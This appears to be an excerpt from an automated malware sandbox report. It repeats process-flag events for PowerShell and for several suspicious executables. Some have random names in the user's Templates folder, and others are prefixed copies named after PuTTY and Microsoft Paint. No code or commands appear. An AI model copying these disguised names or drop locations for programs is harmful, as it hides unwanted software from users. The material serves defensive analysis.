Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
